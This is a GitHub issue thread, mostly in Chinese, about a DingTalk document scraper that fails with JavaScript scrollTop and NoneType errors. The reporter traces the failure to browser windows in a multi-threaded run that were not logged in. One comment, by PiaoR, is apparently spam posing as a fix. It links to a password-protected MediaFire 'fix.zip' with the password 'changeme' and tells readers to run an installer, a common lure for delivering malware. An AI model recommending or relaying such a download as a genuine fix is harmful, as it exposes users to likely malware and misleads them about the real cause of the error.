### ISSUE TITLE
使用该程序下载钉钉知识库报错, 使用的版本为 python3

### ISSUE THREAD

**Issue by Jeremy-boo** [ZoidbergPi/DingDocsScaper#1]
在程序中写入 corpId 和 target_orgid 后,  python3 main.py 执行程序,在寻找钉钉下载按钮报错:
![image](https://github.com/user-attachments/assets/d2b5ee05-9937-4184-bcf2-dcd3f47c00c3)

具体错误信息如下:
2024-08-28 14:05:10.969 | INFO     | __main__:<module>:468 - 启动浏览器。。。
请完成所有浏览器的登录，并在完成后任意键继续
全部下载完成后任意键继续2024-08-28 14:05:35.855 | INFO     | __main__:process_req:108 - 队列长度：3 从【#ROOT#】 添加子节点3个：32.adoc, 测试2, 测试1
2024-08-28 14:05:35.855 | INFO     | __main__:process_node:183 - [4] 开始处理节点:32.adoc 父节点：根节点
2024-08-28 14:05:37.117 | INFO     | __main__:process_node:183 - [2] 开始处理节点:测试2 父节点：根节点
2024-08-28 14:05:39.288 | INFO     | __main__:process_node:183 - [3] 开始处理节点:测试1 父节点：根节点
2024-08-28 14:05:39.497 | INFO     | __main__:process_node:190 - [4] 32.adoc是文件，继续处理
2024-08-28 14:05:39.675 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：
javascript运行错误：
function(){return document.getElementsByClassName("MAINSITE_CATALOG-node-tree-list")[0].scrollTop}
错误信息:
{'exceptionId': 1, 'text': 'Uncaught', 'lineNumber': 0, 'columnNumber': 88, 'scriptId': '87', 'exception': {'type': 'object', 'subtype': 'error', 'className': 'TypeError', 'description': "TypeError: Cannot read properties of undefined (reading 'scrollTop')\n    at HTMLDocument.<anonymous> (<anonymous>:1:89)", 'objectId': '-2782806004928277830.5.3'}}，等待重试
2024-08-28 14:05:39.676 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：
javascript运行错误：
function(){return document.getElementsByClassName("MAINSITE_CATALOG-node-tree-list")[0].scrollTop}
错误信息:
{'exceptionId': 2, 'text': 'Uncaught', 'lineNumber': 0, 'columnNumber': 88, 'scriptId': '87', 'exception': {'type': 'object', 'subtype': 'error', 'className': 'TypeError', 'description': "TypeError: Cannot read properties of undefined (reading 'scrollTop')\n    at HTMLDocument.<anonymous> (<anonymous>:1:89)", 'objectId': '-2782806004928277830.5.5'}}，等待重试
2024-08-28 14:05:39.676 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：
javascript运行错误：
function(){return document.getElementsByClassName("MAINSITE_CATALOG-node-tree-list")[0].scrollTop}
错误信息:
{'exceptionId': 3, 'text': 'Uncaught', 'lineNumber': 0, 'columnNumber': 88, 'scriptId': '87', 'exception': {'type': 'object', 'subtype': 'error', 'className': 'TypeError', 'description': "TypeError: Cannot read properties of undefined (reading 'scrollTop')\n    at HTMLDocument.<anonymous> (<anonymous>:1:89)", 'objectId': '-2782806004928277830.5.7'}}，等待重试
2024-08-28 14:05:39.677 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：
javascript运行错误：
function(){return document.getElementsByClassName("MAINSITE_CATALOG-node-tree-list")[0].scrollTop}
错误信息:
{'exceptionId': 4, 'text': 'Uncaught', 'lineNumber': 0, 'columnNumber': 88, 'scriptId': '87', 'exception': {'type': 'object', 'subtype': 'error', 'className': 'TypeError', 'description': "TypeError: Cannot read properties of undefined (reading 'scrollTop')\n    at HTMLDocument.<anonymous> (<anonymous>:1:89)", 'objectId': '-2782806004928277830.5.9'}}，等待重试
2024-08-28 14:05:39.677 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：
javascript运行错误：
function(){return document.getElementsByClassName("MAINSITE_CATALOG-node-tree-list")[0].scrollTop}
错误信息:
{'exceptionId': 5, 'text': 'Uncaught', 'lineNumber': 0, 'columnNumber': 88, 'scriptId': '87', 'exception': {'type': 'object', 'subtype': 'error', 'className': 'TypeError', 'description': "TypeError: Cannot read properties of undefined (reading 'scrollTop')\n    at HTMLDocument.<anonymous> (<anonymous>:1:89)", 'objectId': '-2782806004928277830.5.11'}}，等待重试
2024-08-28 14:05:39.677 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：
javascript运行错误：
function(){return document.getElementsByClassName("MAINSITE_CATALOG-node-tree-list")[0].scrollTop}
错误信息:
{'exceptionId': 6, 'text': 'Uncaught', 'lineNumber': 0, 'columnNumber': 88, 'scriptId': '87', 'exception': {'type': 'object', 'subtype': 'error', 'className': 'TypeError', 'description': "TypeError: Cannot read properties of undefined (reading 'scrollTop')\n    at HTMLDocument.<anonymous> (<anonymous>:1:89)", 'objectId': '-2782806004928277830.5.13'}}，等待重试
2024-08-28 14:05:39.678 | INFO     | __main__:process_node:183 - [2] 开始处理节点:测试2 父节点：根节点
^CTraceback (most recent call last):
  File "/Users/shansong/workspace/py/DingDocsScaper/main.py", line 482, in <module>
2024-08-28 14:05:40.503 | INFO     | __main__:process_file:295 - [4] 处理文件:32 路径： 文件类型：adoc
2024-08-28 14:05:40.538 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.539 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.539 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.539 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.539 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.539 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.539 | INFO     | __main__:process_file:318 - [4] @data-rbd-draggable-id=Amq4vjg8909AawnYTLzjNmBMJ3kdP0wQ: 'NoneType' object has no attribute 'location'
2024-08-28 14:05:40.540 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.540 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.542 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.542 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.542 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
2024-08-28 14:05:40.543 | ERROR    | __main__:scroll_to_see:246 - 滚动时出错：与页面的连接已断开。，等待重试
    input(f"全部下载完成后任意键继续")
KeyboardInterrupt
2024-08-28 14:05:40.565 | INFO     | __main__:process_node:201 - [4] @data-rbd-draggable-id=Amq4vjg8909AawnYTLzjNmBMJ3kdP0wQ: 'NoneType' object has no attribute 'location' Traceback (most recent call last):
  File "/Users/shansong/workspace/py/DingDocsScaper/main.py", line 199, in process_node
    self.to_item(item)
  File "/Users/shansong/workspace/py/DingDocsScaper/main.py", line 219, in to_item
    item_loc = item.location
               ^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'location'

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZoidbergPi** [comment]
有可能是钉钉内部开始进行样式修改，可以在浏览器里看一下左侧文件栏的DOM节点是否为MAINSITE_CATALOG-node-tree-list，否则可以自己修改一下这个名字

**Comment by Jeremy-boo** [comment]
嗯啦, 我看一下大佬, 我发现钉钉右侧下载这个点击按钮以及相关 div 的class 元素现在都是随机数,每次点击进来 div class 的id 都不一致, 这个影响整体的下载吗?

我找了一下左侧的dom  节点, 现在的 class 是这样了:
class="ReactVirtualized__Grid ReactVirtualized__List MAINSITE_CATALOG-node-tree-list", 不知道跟您前面的是否一样

**Comment by Jeremy-boo** [comment]
问题找到了, 不是页面 div class 元素的问题,这里应该是多线程启动中,有的线程出现获取不到 MAINSITE_CATALOG-node-tree-list 元素的问题, 我在本地改成单线程运行暂时没有问题了
![image](https://github.com/user-attachments/assets/cb621be2-8c0f-4318-bf0e-2569cd73e403)

根因是: 多线程跑的时候,有的窗口我没有登录,导致其中的获取 左边菜单 dom 元素失败.

**Comment by Jeremy-boo** [comment]
谢谢大佬的解答
